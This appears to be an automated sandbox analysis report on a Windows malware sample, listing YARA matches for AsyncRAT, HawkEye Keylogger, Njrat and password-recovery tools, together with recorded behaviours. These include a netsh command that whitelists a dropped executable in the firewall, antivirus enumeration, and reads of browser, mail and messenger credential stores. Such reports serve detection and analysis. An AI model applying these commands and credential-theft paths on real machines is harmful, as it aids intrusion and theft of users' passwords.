            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeCode function: 2_2_049804AE GetUserNameW,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00406278 GetVersionExA,
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
            Modifies the windows firewallShow sources
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
            Uses netsh to modify the Windows network and firewall settingsShow sources
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
            Source: tmp87E4.tmp.exe, 0000000C.00000003.516960849.000000000506E000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information:

            barindex
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
            Yara detected MailPassViewShow sources
            Source: Yara matchFile source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.4027e00.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8ffa72.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8ffa72.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
            Yara detected NjratShow sources
            Source: Yara matchFile source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
            Source: Yara matchFile source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Tries to steal Instant Messenger accounts or passwordsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Tries to steal Mail credentials (via file registry)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
            Yara detected WebBrowserPassView password recovery toolShow sources
            Source: Yara matchFile source: 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5824, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.4040020.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.4040020.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a47b95.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Detected HawkEye RatShow sources
            Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Source: tmpFB21.tmp.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
            Source: tmpFB21.tmp.exeString found in binary or memory: HawkEyeKeylogger
            Source: tmpFB21.tmp.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
            Source: tmpFB21.tmp.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
            Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmpString found in binary or memory: kr'&HawkEye_Keylogger_Execution_Confirmed_
            Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmpString found in binary or memory: kr#"HawkEye_Keylogger_Stealer_Records_
            Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
